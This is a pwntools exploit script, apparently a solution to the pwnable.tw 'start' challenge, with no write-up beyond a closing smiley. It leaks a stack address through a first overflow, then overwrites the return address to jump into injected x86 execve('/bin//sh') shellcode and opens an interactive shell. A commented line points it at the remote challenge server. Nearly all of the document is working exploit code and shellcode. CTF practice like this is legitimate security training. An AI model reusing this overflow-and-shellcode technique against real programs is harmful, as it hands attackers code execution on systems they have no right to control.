[pwnable.tw] start 100pt

from pwn import *
s = process("./start")
#s = remote("chall.pwnable.tw",10000)
shell = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"

elf = ELF("./start")
doldol = 0x08048087

print s.recvuntil("Let's start the CTF:")

pay = "A" * 20
pay += p32(doldol)
s.send(pay)
stack = u32(s.recv(4))
print "stack address : %s" %str(hex(stack))

pay = "B" * 20
pay += p32(stack+0x14)
pay += "\x31\xC0\x31\xDB\x31\xC9\x31\xD2"
pay += shell
s.send(pay)

print s.recv(1024)
s.interactive()

:))